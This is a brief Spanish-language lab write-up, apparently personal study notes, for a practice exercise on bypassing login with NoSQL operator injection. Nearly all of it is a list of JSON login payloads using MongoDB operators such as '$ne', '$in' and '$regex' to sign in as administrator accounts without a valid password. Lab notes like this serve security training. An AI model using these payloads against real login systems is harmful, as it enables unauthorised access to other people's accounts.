💼Laboratorio: Exploiting NoSQL operator injection to bypass authentication






PreviousLaboratorio: Detecting NoSQL injectionNextLaboratorio: Exploiting NoSQL injection to extract data
Last updated






Last updated
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}{"username":"wiener","password":"peter"}
//lo reemplazaré por esto:
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}
{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$in":["admin","","invalid"]}}
{"username":{"$in":["administrator","admin","superadmin"]},"password":{"$in":["Invalid username or password","","invalid"]}}
{"username":"administrator","password":{"$ne":"invalid"}}
{"username":"administrator","password":{"$ne":invalid}}
{"username":"wiener","password":{"$ne":null}}{"username": {"$regex":"admin*"}, "password": {"$ne": null}}
{"username": {"$regex":"admin*"}, "password": {"$ne": "bicitetas23"}}
"ne" es not equal.